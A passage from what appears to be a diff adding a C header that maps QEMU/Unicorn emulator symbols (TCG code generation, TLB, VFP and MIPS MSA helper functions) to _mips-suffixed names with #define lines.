tcg_accel_type_mips +#define tcg_add_param_i32 tcg_add_param_i32_mips +#define tcg_add_param_i64 tcg_add_param_i64_mips +#define tcg_add_target_add_op_defs tcg_add_target_add_op_defs_mips +#define tcg_allowed tcg_allowed_mips +#define tcg_canonicalize_memop tcg_canonicalize_memop_mips +#define tcg_commit tcg_commit_mips +#define tcg_cond_to_jcc tcg_cond_to_jcc_mips +#define tcg_constant_folding 
tcg_constant_folding_mips +#define tcg_const_i32 tcg_const_i32_mips +#define tcg_const_i64 tcg_const_i64_mips +#define tcg_const_local_i32 tcg_const_local_i32_mips +#define tcg_const_local_i64 tcg_const_local_i64_mips +#define tcg_context_init tcg_context_init_mips +#define tcg_cpu_address_space_init tcg_cpu_address_space_init_mips +#define tcg_cpu_exec tcg_cpu_exec_mips +#define tcg_current_code_size tcg_current_code_size_mips +#define tcg_dump_info tcg_dump_info_mips +#define tcg_dump_ops tcg_dump_ops_mips +#define tcg_exec_all tcg_exec_all_mips +#define tcg_find_helper tcg_find_helper_mips +#define tcg_func_start tcg_func_start_mips +#define tcg_gen_abs_i32 tcg_gen_abs_i32_mips +#define tcg_gen_add2_i32 tcg_gen_add2_i32_mips +#define tcg_gen_add_i32 tcg_gen_add_i32_mips +#define tcg_gen_add_i64 tcg_gen_add_i64_mips +#define tcg_gen_addi_i32 tcg_gen_addi_i32_mips +#define tcg_gen_addi_i64 tcg_gen_addi_i64_mips +#define tcg_gen_andc_i32 tcg_gen_andc_i32_mips +#define tcg_gen_and_i32 tcg_gen_and_i32_mips +#define tcg_gen_and_i64 tcg_gen_and_i64_mips +#define tcg_gen_andi_i32 tcg_gen_andi_i32_mips +#define tcg_gen_andi_i64 tcg_gen_andi_i64_mips +#define tcg_gen_br tcg_gen_br_mips +#define tcg_gen_brcond_i32 tcg_gen_brcond_i32_mips +#define tcg_gen_brcond_i64 tcg_gen_brcond_i64_mips +#define tcg_gen_brcondi_i32 tcg_gen_brcondi_i32_mips +#define tcg_gen_bswap16_i32 tcg_gen_bswap16_i32_mips +#define tcg_gen_bswap32_i32 tcg_gen_bswap32_i32_mips +#define tcg_gen_callN tcg_gen_callN_mips +#define tcg_gen_code tcg_gen_code_mips +#define tcg_gen_code_common tcg_gen_code_common_mips +#define tcg_gen_code_search_pc tcg_gen_code_search_pc_mips +#define tcg_gen_concat_i32_i64 tcg_gen_concat_i32_i64_mips +#define tcg_gen_debug_insn_start tcg_gen_debug_insn_start_mips +#define tcg_gen_deposit_i32 tcg_gen_deposit_i32_mips +#define tcg_gen_exit_tb tcg_gen_exit_tb_mips +#define tcg_gen_ext16s_i32 tcg_gen_ext16s_i32_mips +#define tcg_gen_ext16u_i32 tcg_gen_ext16u_i32_mips +#define 
tcg_gen_ext32s_i64 tcg_gen_ext32s_i64_mips +#define tcg_gen_ext32u_i64 tcg_gen_ext32u_i64_mips +#define tcg_gen_ext8s_i32 tcg_gen_ext8s_i32_mips +#define tcg_gen_ext8u_i32 tcg_gen_ext8u_i32_mips +#define tcg_gen_ext_i32_i64 tcg_gen_ext_i32_i64_mips +#define tcg_gen_extu_i32_i64 tcg_gen_extu_i32_i64_mips +#define tcg_gen_goto_tb tcg_gen_goto_tb_mips +#define tcg_gen_ld_i32 tcg_gen_ld_i32_mips +#define tcg_gen_ld_i64 tcg_gen_ld_i64_mips +#define tcg_gen_ldst_op_i32 tcg_gen_ldst_op_i32_mips +#define tcg_gen_ldst_op_i64 tcg_gen_ldst_op_i64_mips +#define tcg_gen_movcond_i32 tcg_gen_movcond_i32_mips +#define tcg_gen_movcond_i64 tcg_gen_movcond_i64_mips +#define tcg_gen_mov_i32 tcg_gen_mov_i32_mips +#define tcg_gen_mov_i64 tcg_gen_mov_i64_mips +#define tcg_gen_movi_i32 tcg_gen_movi_i32_mips +#define tcg_gen_movi_i64 tcg_gen_movi_i64_mips +#define tcg_gen_mul_i32 tcg_gen_mul_i32_mips +#define tcg_gen_muls2_i32 tcg_gen_muls2_i32_mips +#define tcg_gen_mulu2_i32 tcg_gen_mulu2_i32_mips +#define tcg_gen_neg_i32 tcg_gen_neg_i32_mips +#define tcg_gen_neg_i64 tcg_gen_neg_i64_mips +#define tcg_gen_not_i32 tcg_gen_not_i32_mips +#define tcg_gen_op0 tcg_gen_op0_mips +#define tcg_gen_op1i tcg_gen_op1i_mips +#define tcg_gen_op2_i32 tcg_gen_op2_i32_mips +#define tcg_gen_op2_i64 tcg_gen_op2_i64_mips +#define tcg_gen_op2i_i32 tcg_gen_op2i_i32_mips +#define tcg_gen_op2i_i64 tcg_gen_op2i_i64_mips +#define tcg_gen_op3_i32 tcg_gen_op3_i32_mips +#define tcg_gen_op3_i64 tcg_gen_op3_i64_mips +#define tcg_gen_op4_i32 tcg_gen_op4_i32_mips +#define tcg_gen_op4i_i32 tcg_gen_op4i_i32_mips +#define tcg_gen_op4ii_i32 tcg_gen_op4ii_i32_mips +#define tcg_gen_op4ii_i64 tcg_gen_op4ii_i64_mips +#define tcg_gen_op5ii_i32 tcg_gen_op5ii_i32_mips +#define tcg_gen_op6_i32 tcg_gen_op6_i32_mips +#define tcg_gen_op6i_i32 tcg_gen_op6i_i32_mips +#define tcg_gen_op6i_i64 tcg_gen_op6i_i64_mips +#define tcg_gen_orc_i32 tcg_gen_orc_i32_mips +#define tcg_gen_or_i32 tcg_gen_or_i32_mips +#define tcg_gen_or_i64 
tcg_gen_or_i64_mips +#define tcg_gen_ori_i32 tcg_gen_ori_i32_mips +#define tcg_gen_qemu_ld_i32 tcg_gen_qemu_ld_i32_mips +#define tcg_gen_qemu_ld_i64 tcg_gen_qemu_ld_i64_mips +#define tcg_gen_qemu_st_i32 tcg_gen_qemu_st_i32_mips +#define tcg_gen_qemu_st_i64 tcg_gen_qemu_st_i64_mips +#define tcg_gen_rotl_i32 tcg_gen_rotl_i32_mips +#define tcg_gen_rotli_i32 tcg_gen_rotli_i32_mips +#define tcg_gen_rotr_i32 tcg_gen_rotr_i32_mips +#define tcg_gen_rotri_i32 tcg_gen_rotri_i32_mips +#define tcg_gen_sar_i32 tcg_gen_sar_i32_mips +#define tcg_gen_sari_i32 tcg_gen_sari_i32_mips +#define tcg_gen_setcond_i32 tcg_gen_setcond_i32_mips +#define tcg_gen_shl_i32 tcg_gen_shl_i32_mips +#define tcg_gen_shl_i64 tcg_gen_shl_i64_mips +#define tcg_gen_shli_i32 tcg_gen_shli_i32_mips +#define tcg_gen_shli_i64 tcg_gen_shli_i64_mips +#define tcg_gen_shr_i32 tcg_gen_shr_i32_mips +#define tcg_gen_shifti_i64 tcg_gen_shifti_i64_mips +#define tcg_gen_shr_i64 tcg_gen_shr_i64_mips +#define tcg_gen_shri_i32 tcg_gen_shri_i32_mips +#define tcg_gen_shri_i64 tcg_gen_shri_i64_mips +#define tcg_gen_st_i32 tcg_gen_st_i32_mips +#define tcg_gen_st_i64 tcg_gen_st_i64_mips +#define tcg_gen_sub_i32 tcg_gen_sub_i32_mips +#define tcg_gen_sub_i64 tcg_gen_sub_i64_mips +#define tcg_gen_subi_i32 tcg_gen_subi_i32_mips +#define tcg_gen_trunc_i64_i32 tcg_gen_trunc_i64_i32_mips +#define tcg_gen_trunc_shr_i64_i32 tcg_gen_trunc_shr_i64_i32_mips +#define tcg_gen_xor_i32 tcg_gen_xor_i32_mips +#define tcg_gen_xor_i64 tcg_gen_xor_i64_mips +#define tcg_gen_xori_i32 tcg_gen_xori_i32_mips +#define tcg_get_arg_str_i32 tcg_get_arg_str_i32_mips +#define tcg_get_arg_str_i64 tcg_get_arg_str_i64_mips +#define tcg_get_arg_str_idx tcg_get_arg_str_idx_mips +#define tcg_global_mem_new_i32 tcg_global_mem_new_i32_mips +#define tcg_global_mem_new_i64 tcg_global_mem_new_i64_mips +#define tcg_global_mem_new_internal tcg_global_mem_new_internal_mips +#define tcg_global_reg_new_i32 tcg_global_reg_new_i32_mips +#define tcg_global_reg_new_i64 
tcg_global_reg_new_i64_mips +#define tcg_global_reg_new_internal tcg_global_reg_new_internal_mips +#define tcg_handle_interrupt tcg_handle_interrupt_mips +#define tcg_init tcg_init_mips +#define tcg_invert_cond tcg_invert_cond_mips +#define tcg_la_bb_end tcg_la_bb_end_mips +#define tcg_la_br_end tcg_la_br_end_mips +#define tcg_la_func_end tcg_la_func_end_mips +#define tcg_liveness_analysis tcg_liveness_analysis_mips +#define tcg_malloc tcg_malloc_mips +#define tcg_malloc_internal tcg_malloc_internal_mips +#define tcg_op_defs_org tcg_op_defs_org_mips +#define tcg_opt_gen_mov tcg_opt_gen_mov_mips +#define tcg_opt_gen_movi tcg_opt_gen_movi_mips +#define tcg_optimize tcg_optimize_mips +#define tcg_out16 tcg_out16_mips +#define tcg_out32 tcg_out32_mips +#define tcg_out64 tcg_out64_mips +#define tcg_out8 tcg_out8_mips +#define tcg_out_addi tcg_out_addi_mips +#define tcg_out_branch tcg_out_branch_mips +#define tcg_out_brcond32 tcg_out_brcond32_mips +#define tcg_out_brcond64 tcg_out_brcond64_mips +#define tcg_out_bswap32 tcg_out_bswap32_mips +#define tcg_out_bswap64 tcg_out_bswap64_mips +#define tcg_out_call tcg_out_call_mips +#define tcg_out_cmp tcg_out_cmp_mips +#define tcg_out_ext16s tcg_out_ext16s_mips +#define tcg_out_ext16u tcg_out_ext16u_mips +#define tcg_out_ext32s tcg_out_ext32s_mips +#define tcg_out_ext32u tcg_out_ext32u_mips +#define tcg_out_ext8s tcg_out_ext8s_mips +#define tcg_out_ext8u tcg_out_ext8u_mips +#define tcg_out_jmp tcg_out_jmp_mips +#define tcg_out_jxx tcg_out_jxx_mips +#define tcg_out_label tcg_out_label_mips +#define tcg_out_ld tcg_out_ld_mips +#define tcg_out_modrm tcg_out_modrm_mips +#define tcg_out_modrm_offset tcg_out_modrm_offset_mips +#define tcg_out_modrm_sib_offset tcg_out_modrm_sib_offset_mips +#define tcg_out_mov tcg_out_mov_mips +#define tcg_out_movcond32 tcg_out_movcond32_mips +#define tcg_out_movcond64 tcg_out_movcond64_mips +#define tcg_out_movi tcg_out_movi_mips +#define tcg_out_op tcg_out_op_mips +#define tcg_out_pop 
tcg_out_pop_mips +#define tcg_out_push tcg_out_push_mips +#define tcg_out_qemu_ld tcg_out_qemu_ld_mips +#define tcg_out_qemu_ld_direct tcg_out_qemu_ld_direct_mips +#define tcg_out_qemu_ld_slow_path tcg_out_qemu_ld_slow_path_mips +#define tcg_out_qemu_st tcg_out_qemu_st_mips +#define tcg_out_qemu_st_direct tcg_out_qemu_st_direct_mips +#define tcg_out_qemu_st_slow_path tcg_out_qemu_st_slow_path_mips +#define tcg_out_reloc tcg_out_reloc_mips +#define tcg_out_rolw_8 tcg_out_rolw_8_mips +#define tcg_out_setcond32 tcg_out_setcond32_mips +#define tcg_out_setcond64 tcg_out_setcond64_mips +#define tcg_out_shifti tcg_out_shifti_mips +#define tcg_out_st tcg_out_st_mips +#define tcg_out_tb_finalize tcg_out_tb_finalize_mips +#define tcg_out_tb_init tcg_out_tb_init_mips +#define tcg_out_tlb_load tcg_out_tlb_load_mips +#define tcg_out_vex_modrm tcg_out_vex_modrm_mips +#define tcg_patch32 tcg_patch32_mips +#define tcg_patch8 tcg_patch8_mips +#define tcg_pcrel_diff tcg_pcrel_diff_mips +#define tcg_pool_reset tcg_pool_reset_mips +#define tcg_prologue_init tcg_prologue_init_mips +#define tcg_ptr_byte_diff tcg_ptr_byte_diff_mips +#define tcg_reg_alloc tcg_reg_alloc_mips +#define tcg_reg_alloc_bb_end tcg_reg_alloc_bb_end_mips +#define tcg_reg_alloc_call tcg_reg_alloc_call_mips +#define tcg_reg_alloc_mov tcg_reg_alloc_mov_mips +#define tcg_reg_alloc_movi tcg_reg_alloc_movi_mips +#define tcg_reg_alloc_op tcg_reg_alloc_op_mips +#define tcg_reg_alloc_start tcg_reg_alloc_start_mips +#define tcg_reg_free tcg_reg_free_mips +#define tcg_reg_sync tcg_reg_sync_mips +#define tcg_set_frame tcg_set_frame_mips +#define tcg_set_nop tcg_set_nop_mips +#define tcg_swap_cond tcg_swap_cond_mips +#define tcg_target_callee_save_regs tcg_target_callee_save_regs_mips +#define tcg_target_call_iarg_regs tcg_target_call_iarg_regs_mips +#define tcg_target_call_oarg_regs tcg_target_call_oarg_regs_mips +#define tcg_target_const_match tcg_target_const_match_mips +#define tcg_target_init tcg_target_init_mips +#define 
tcg_target_qemu_prologue tcg_target_qemu_prologue_mips +#define tcg_target_reg_alloc_order tcg_target_reg_alloc_order_mips +#define tcg_temp_alloc tcg_temp_alloc_mips +#define tcg_temp_free_i32 tcg_temp_free_i32_mips +#define tcg_temp_free_i64 tcg_temp_free_i64_mips +#define tcg_temp_free_internal tcg_temp_free_internal_mips +#define tcg_temp_local_new_i32 tcg_temp_local_new_i32_mips +#define tcg_temp_local_new_i64 tcg_temp_local_new_i64_mips +#define tcg_temp_new_i32 tcg_temp_new_i32_mips +#define tcg_temp_new_i64 tcg_temp_new_i64_mips +#define tcg_temp_new_internal tcg_temp_new_internal_mips +#define tcg_temp_new_internal_i32 tcg_temp_new_internal_i32_mips +#define tcg_temp_new_internal_i64 tcg_temp_new_internal_i64_mips +#define tdb_hash tdb_hash_mips +#define teecr_write teecr_write_mips +#define teehbr_access teehbr_access_mips +#define temp_allocate_frame temp_allocate_frame_mips +#define temp_dead temp_dead_mips +#define temps_are_copies temps_are_copies_mips +#define temp_save temp_save_mips +#define temp_sync temp_sync_mips +#define tgen_arithi tgen_arithi_mips +#define tgen_arithr tgen_arithr_mips +#define thumb2_logic_op thumb2_logic_op_mips +#define ti925t_initfn ti925t_initfn_mips +#define tlb_add_large_page tlb_add_large_page_mips +#define tlb_flush_entry tlb_flush_entry_mips +#define tlbi_aa64_asid_is_write tlbi_aa64_asid_is_write_mips +#define tlbi_aa64_asid_write tlbi_aa64_asid_write_mips +#define tlbi_aa64_vaa_is_write tlbi_aa64_vaa_is_write_mips +#define tlbi_aa64_vaa_write tlbi_aa64_vaa_write_mips +#define tlbi_aa64_va_is_write tlbi_aa64_va_is_write_mips +#define tlbi_aa64_va_write tlbi_aa64_va_write_mips +#define tlbiall_is_write tlbiall_is_write_mips +#define tlbiall_write tlbiall_write_mips +#define tlbiasid_is_write tlbiasid_is_write_mips +#define tlbiasid_write tlbiasid_write_mips +#define tlbimvaa_is_write tlbimvaa_is_write_mips +#define tlbimvaa_write tlbimvaa_write_mips +#define tlbimva_is_write tlbimva_is_write_mips +#define 
tlbimva_write tlbimva_write_mips +#define tlb_is_dirty_ram tlb_is_dirty_ram_mips +#define tlb_protect_code tlb_protect_code_mips +#define tlb_reset_dirty_range tlb_reset_dirty_range_mips +#define tlb_reset_dirty_range_all tlb_reset_dirty_range_all_mips +#define tlb_set_dirty tlb_set_dirty_mips +#define tlb_set_dirty1 tlb_set_dirty1_mips +#define tlb_unprotect_code_phys tlb_unprotect_code_phys_mips +#define tlb_vaddr_to_host tlb_vaddr_to_host_mips +#define token_get_type token_get_type_mips +#define token_get_value token_get_value_mips +#define token_is_escape token_is_escape_mips +#define token_is_keyword token_is_keyword_mips +#define token_is_operator token_is_operator_mips +#define tokens_append_from_iter tokens_append_from_iter_mips +#define to_qiv to_qiv_mips +#define to_qov to_qov_mips +#define tosa_init tosa_init_mips +#define tosa_machine_init tosa_machine_init_mips +#define tswap32 tswap32_mips +#define tswap64 tswap64_mips +#define type_class_get_size type_class_get_size_mips +#define type_get_by_name type_get_by_name_mips +#define type_get_parent type_get_parent_mips +#define type_has_parent type_has_parent_mips +#define type_initialize type_initialize_mips +#define type_initialize_interface type_initialize_interface_mips +#define type_is_ancestor type_is_ancestor_mips +#define type_new type_new_mips +#define type_object_get_size type_object_get_size_mips +#define type_register_internal type_register_internal_mips +#define type_table_add type_table_add_mips +#define type_table_get type_table_get_mips +#define type_table_lookup type_table_lookup_mips +#define uint16_to_float32 uint16_to_float32_mips +#define uint16_to_float64 uint16_to_float64_mips +#define uint32_to_float32 uint32_to_float32_mips +#define uint32_to_float64 uint32_to_float64_mips +#define uint64_to_float128 uint64_to_float128_mips +#define uint64_to_float32 uint64_to_float32_mips +#define uint64_to_float64 uint64_to_float64_mips +#define unassigned_io_ops unassigned_io_ops_mips +#define 
unassigned_io_read unassigned_io_read_mips +#define unassigned_io_write unassigned_io_write_mips +#define unassigned_mem_accepts unassigned_mem_accepts_mips +#define unassigned_mem_ops unassigned_mem_ops_mips +#define unassigned_mem_read unassigned_mem_read_mips +#define unassigned_mem_write unassigned_mem_write_mips +#define update_spsel update_spsel_mips +#define v6_cp_reginfo v6_cp_reginfo_mips +#define v6k_cp_reginfo v6k_cp_reginfo_mips +#define v7_cp_reginfo v7_cp_reginfo_mips +#define v7mp_cp_reginfo v7mp_cp_reginfo_mips +#define v7m_pop v7m_pop_mips +#define v7m_push v7m_push_mips +#define v8_cp_reginfo v8_cp_reginfo_mips +#define v8_el2_cp_reginfo v8_el2_cp_reginfo_mips +#define v8_el3_cp_reginfo v8_el3_cp_reginfo_mips +#define v8_el3_no_el2_cp_reginfo v8_el3_no_el2_cp_reginfo_mips +#define vapa_cp_reginfo vapa_cp_reginfo_mips +#define vbar_write vbar_write_mips +#define vfp_exceptbits_from_host vfp_exceptbits_from_host_mips +#define vfp_exceptbits_to_host vfp_exceptbits_to_host_mips +#define vfp_get_fpcr vfp_get_fpcr_mips +#define vfp_get_fpscr vfp_get_fpscr_mips +#define vfp_get_fpsr vfp_get_fpsr_mips +#define vfp_reg_offset vfp_reg_offset_mips +#define vfp_set_fpcr vfp_set_fpcr_mips +#define vfp_set_fpscr vfp_set_fpscr_mips +#define vfp_set_fpsr vfp_set_fpsr_mips +#define visit_end_implicit_struct visit_end_implicit_struct_mips +#define visit_end_list visit_end_list_mips +#define visit_end_struct visit_end_struct_mips +#define visit_end_union visit_end_union_mips +#define visit_get_next_type visit_get_next_type_mips +#define visit_next_list visit_next_list_mips +#define visit_optional visit_optional_mips +#define visit_start_implicit_struct visit_start_implicit_struct_mips +#define visit_start_list visit_start_list_mips +#define visit_start_struct visit_start_struct_mips +#define visit_start_union visit_start_union_mips +#define vmsa_cp_reginfo vmsa_cp_reginfo_mips +#define vmsa_tcr_el1_write vmsa_tcr_el1_write_mips +#define vmsa_ttbcr_raw_write 
vmsa_ttbcr_raw_write_mips +#define vmsa_ttbcr_reset vmsa_ttbcr_reset_mips +#define vmsa_ttbcr_write vmsa_ttbcr_write_mips +#define vmsa_ttbr_write vmsa_ttbr_write_mips +#define write_cpustate_to_list write_cpustate_to_list_mips +#define write_list_to_cpustate write_list_to_cpustate_mips +#define write_raw_cp_reg write_raw_cp_reg_mips +#define X86CPURegister32_lookup X86CPURegister32_lookup_mips +#define x86_op_defs x86_op_defs_mips +#define xpsr_read xpsr_read_mips +#define xpsr_write xpsr_write_mips +#define xscale_cpar_write xscale_cpar_write_mips +#define xscale_cp_reginfo xscale_cp_reginfo_mips +#define cpu_mips_exec cpu_mips_exec_mips +#define cpu_mips_get_random cpu_mips_get_random_mips +#define cpu_mips_get_count cpu_mips_get_count_mips +#define cpu_mips_store_count cpu_mips_store_count_mips +#define cpu_mips_store_compare cpu_mips_store_compare_mips +#define cpu_mips_start_count cpu_mips_start_count_mips +#define cpu_mips_stop_count cpu_mips_stop_count_mips +#define mips_machine_init mips_machine_init_mips +#define cpu_mips_kseg0_to_phys cpu_mips_kseg0_to_phys_mips +#define cpu_mips_phys_to_kseg0 cpu_mips_phys_to_kseg0_mips +#define cpu_mips_kvm_um_phys_to_kseg0 cpu_mips_kvm_um_phys_to_kseg0_mips +#define mips_cpu_register_types mips_cpu_register_types_mips +#define cpu_mips_init cpu_mips_init_mips +#define cpu_state_reset cpu_state_reset_mips +#define helper_msa_andi_b helper_msa_andi_b_mips +#define helper_msa_ori_b helper_msa_ori_b_mips +#define helper_msa_nori_b helper_msa_nori_b_mips +#define helper_msa_xori_b helper_msa_xori_b_mips +#define helper_msa_bmnzi_b helper_msa_bmnzi_b_mips +#define helper_msa_bmzi_b helper_msa_bmzi_b_mips +#define helper_msa_bseli_b helper_msa_bseli_b_mips +#define helper_msa_shf_df helper_msa_shf_df_mips +#define helper_msa_and_v helper_msa_and_v_mips +#define helper_msa_or_v helper_msa_or_v_mips +#define helper_msa_nor_v helper_msa_nor_v_mips +#define helper_msa_xor_v helper_msa_xor_v_mips +#define helper_msa_bmnz_v 
helper_msa_bmnz_v_mips +#define helper_msa_bmz_v helper_msa_bmz_v_mips +#define helper_msa_bsel_v helper_msa_bsel_v_mips +#define helper_msa_addvi_df helper_msa_addvi_df_mips +#define helper_msa_subvi_df helper_msa_subvi_df_mips +#define helper_msa_ceqi_df helper_msa_ceqi_df_mips +#define helper_msa_clei_s_df helper_msa_clei_s_df_mips +#define helper_msa_clei_u_df helper_msa_clei_u_df_mips +#define helper_msa_clti_s_df helper_msa_clti_s_df_mips +#define helper_msa_clti_u_df helper_msa_clti_u_df_mips +#define helper_msa_maxi_s_df helper_msa_maxi_s_df_mips +#define helper_msa_maxi_u_df helper_msa_maxi_u_df_mips +#define helper_msa_mini_s_df helper_msa_mini_s_df_mips +#define helper_msa_mini_u_df helper_msa_mini_u_df_mips +#define helper_msa_ldi_df helper_msa_ldi_df_mips +#define helper_msa_slli_df helper_msa_slli_df_mips +#define helper_msa_srai_df helper_msa_srai_df_mips +#define helper_msa_srli_df helper_msa_srli_df_mips +#define helper_msa_bclri_df helper_msa_bclri_df_mips +#define helper_msa_bseti_df helper_msa_bseti_df_mips +#define helper_msa_bnegi_df helper_msa_bnegi_df_mips +#define helper_msa_sat_s_df helper_msa_sat_s_df_mips +#define helper_msa_sat_u_df helper_msa_sat_u_df_mips +#define helper_msa_srari_df helper_msa_srari_df_mips +#define helper_msa_srlri_df helper_msa_srlri_df_mips +#define helper_msa_binsli_df helper_msa_binsli_df_mips +#define helper_msa_binsri_df helper_msa_binsri_df_mips +#define helper_msa_sll_df helper_msa_sll_df_mips +#define helper_msa_sra_df helper_msa_sra_df_mips +#define helper_msa_srl_df helper_msa_srl_df_mips +#define helper_msa_bclr_df helper_msa_bclr_df_mips +#define helper_msa_bset_df helper_msa_bset_df_mips +#define helper_msa_bneg_df helper_msa_bneg_df_mips +#define helper_msa_addv_df helper_msa_addv_df_mips +#define helper_msa_subv_df helper_msa_subv_df_mips +#define helper_msa_max_s_df helper_msa_max_s_df_mips +#define helper_msa_max_u_df helper_msa_max_u_df_mips +#define helper_msa_min_s_df helper_msa_min_s_df_mips 
+#define helper_msa_min_u_df helper_msa_min_u_df_mips +#define helper_msa_max_a_df helper_msa_max_a_df_mips +#define helper_msa_min_a_df helper_msa_min_a_df_mips +#define helper_msa_ceq_df helper_msa_ceq_df_mips +#define helper_msa_clt_s_df helper_msa_clt_s_df_mips +#define helper_msa_clt_u_df helper_msa_clt_u_df_mips +#define helper_msa_cle_s_df helper_msa_cle_s_df_mips +#define helper_msa_cle_u_df helper_msa_cle_u_df_mips +#define helper_msa_add_a_df helper_msa_add_a_df_mips +#define helper_msa_adds_a_df helper_msa_adds_a_df_mips +#define helper_msa_adds_s_df helper_msa_adds_s_df_mips +#define helper_msa_adds_u_df helper_msa_adds_u_df_mips +#define helper_msa_ave_s_df helper_msa_ave_s_df_mips +#define helper_msa_ave_u_df helper_msa_ave_u_df_mips +#define helper_msa_aver_s_df helper_msa_aver_s_df_mips +#define helper_msa_aver_u_df helper_msa_aver_u_df_mips +#define helper_msa_subs_s_df helper_msa_subs_s_df_mips +#define helper_msa_subs_u_df helper_msa_subs_u_df_mips +#define helper_msa_subsus_u_df helper_msa_subsus_u_df_mips +#define helper_msa_subsuu_s_df helper_msa_subsuu_s_df_mips +#define helper_msa_asub_s_df helper_msa_asub_s_df_mips +#define helper_msa_asub_u_df helper_msa_asub_u_df_mips +#define helper_msa_mulv_df helper_msa_mulv_df_mips +#define helper_msa_div_s_df helper_msa_div_s_df_mips +#define helper_msa_div_u_df helper_msa_div_u_df_mips +#define helper_msa_mod_s_df helper_msa_mod_s_df_mips +#define helper_msa_mod_u_df helper_msa_mod_u_df_mips +#define helper_msa_dotp_s_df helper_msa_dotp_s_df_mips +#define helper_msa_dotp_u_df helper_msa_dotp_u_df_mips +#define helper_msa_srar_df helper_msa_srar_df_mips +#define helper_msa_srlr_df helper_msa_srlr_df_mips +#define helper_msa_hadd_s_df helper_msa_hadd_s_df_mips +#define helper_msa_hadd_u_df helper_msa_hadd_u_df_mips +#define helper_msa_hsub_s_df helper_msa_hsub_s_df_mips +#define helper_msa_hsub_u_df helper_msa_hsub_u_df_mips +#define helper_msa_mul_q_df helper_msa_mul_q_df_mips +#define 
helper_msa_mulr_q_df helper_msa_mulr_q_df_mips +#define helper_msa_sld_df helper_msa_sld_df_mips +#define helper_msa_maddv_df helper_msa_maddv_df_mips +#define helper_msa_msubv_df helper_msa_msubv_df_mips +#define helper_msa_dpadd_s_df helper_msa_dpadd_s_df_mips +#define helper_msa_dpadd_u_df helper_msa_dpadd_u_df_mips +#define helper_msa_dpsub_s_df helper_msa_dpsub_s_df_mips +#define helper_msa_dpsub_u_df helper_msa_dpsub_u_df_mips +#define helper_msa_binsl_df helper_msa_binsl_df_mips +#define helper_msa_binsr_df helper_msa_binsr_df_mips +#define helper_msa_madd_q_df helper_msa_madd_q_df_mips +#define helper_msa_msub_q_df helper_msa_msub_q_df_mips +#define helper_msa_maddr_q_df helper_msa_maddr_q_df_mips +#define helper_msa_msubr_q_df helper_msa_msubr_q_df_mips +#define helper_msa_splat_df helper_msa_splat_df_mips +#define helper_msa_pckev_df helper_msa_pckev_df_mips +#define helper_msa_pckod_df helper_msa_pckod_df_mips +#define helper_msa_ilvl_df helper_msa_ilvl_df_mips +#define helper_msa_ilvr_df helper_msa_ilvr_df_mips +#define helper_msa_ilvev_df helper_msa_ilvev_df_mips +#define helper_msa_ilvod_df helper_msa_ilvod_df_mips +#define helper_msa_vshf_df helper_msa_vshf_df_mips +#define helper_msa_sldi_df helper_msa_sldi_df_mips +#define helper_msa_splati_df helper_msa_splati_df_mips +#define helper_msa_copy_s_df helper_msa_copy_s_df_mips +#define helper_msa_copy_u_df helper_msa_copy_u_df_mips +#define helper_msa_insert_df helper_msa_insert_df_mips +#define helper_msa_insve_df helper_msa_insve_df_mips +#define helper_msa_ctcmsa helper_msa_ctcmsa_mips +#define helper_msa_cfcmsa helper_msa_cfcmsa_mips +#define helper_msa_move_v helper_msa_move_v_mips +#define helper_msa_fill_df helper_msa_fill_df_mips +#define helper_msa_nlzc_df helper_msa_nlzc_df_mips +#define helper_msa_nloc_df helper_msa_nloc_df_mips +#define helper_msa_pcnt_df helper_msa_pcnt_df_mips +#define helper_msa_fcaf_df helper_msa_fcaf_df_mips +#define helper_msa_fcun_df helper_msa_fcun_df_mips +#define 
helper_msa_fceq_df helper_msa_fceq_df_mips +#define helper_msa_fcueq_df helper_msa_fcueq_df_mips +#define helper_msa_fclt_df helper_msa_fclt_df_mips +#define helper_msa_fcult_df helper_msa_fcult_df_mips +#define helper_msa_fcle_df helper_msa_fcle_df_mips +#define helper_msa_fcule_df helper_msa_fcule_df_mips +#define helper_msa_fsaf_df helper_msa_fsaf_df_mips +#define helper_msa_fsun_df helper_msa_fsun_df_mips +#define helper_msa_fseq_df helper_msa_fseq_df_mips +#define helper_msa_fsueq_df helper_msa_fsueq_df_mips +#define helper_msa_fslt_df helper_msa_fslt_df_mips +#define helper_msa_fsult_df helper_msa_fsult_df_mips +#define helper_msa_fsle_df helper_msa_fsle_df_mips +#define helper_msa_fsule_df helper_msa_fsule_df_mips +#define helper_msa_fcor_df helper_msa_fcor_df_mips +#define helper_msa_fcune_df helper_msa_fcune_df_mips +#define helper_msa_fcne_df helper_msa_fcne_df_mips +#define helper_msa_fsor_df helper_msa_fsor_df_mips +#define helper_msa_fsune_df helper_msa_fsune_df_mips +#define helper_msa_fsne_df helper_msa_fsne_df_mips +#define helper_msa_fadd_df helper_msa_fadd_df_mips +#define helper_msa_fsub_df helper_msa_fsub_df_mips +#define helper_msa_fmul_df helper_msa_fmul_df_mips +#define helper_msa_fdiv_df helper_msa_fdiv_df_mips +#define helper_msa_fmadd_df helper_msa_fmadd_df_mips +#define helper_msa_fmsub_df helper_msa_fmsub_df_mips +#define helper_msa_fexp2_df helper_msa_fexp2_df_mips +#define helper_msa_fexdo_df helper_msa_fexdo_df_mips +#define helper_msa_ftq_df helper_msa_ftq_df_mips +#define helper_msa_fmin_df helper_msa_fmin_df_mips +#define helper_msa_fmin_a_df helper_msa_fmin_a_df_mips +#define helper_msa_fmax_df helper_msa_fmax_df_mips +#define helper_msa_fmax_a_df helper_msa_fmax_a_df_mips +#define helper_msa_fclass_df helper_msa_fclass_df_mips +#define helper_msa_ftrunc_s_df helper_msa_ftrunc_s_df_mips +#define helper_msa_ftrunc_u_df helper_msa_ftrunc_u_df_mips +#define helper_msa_fsqrt_df helper_msa_fsqrt_df_mips +#define helper_msa_frsqrt_df 
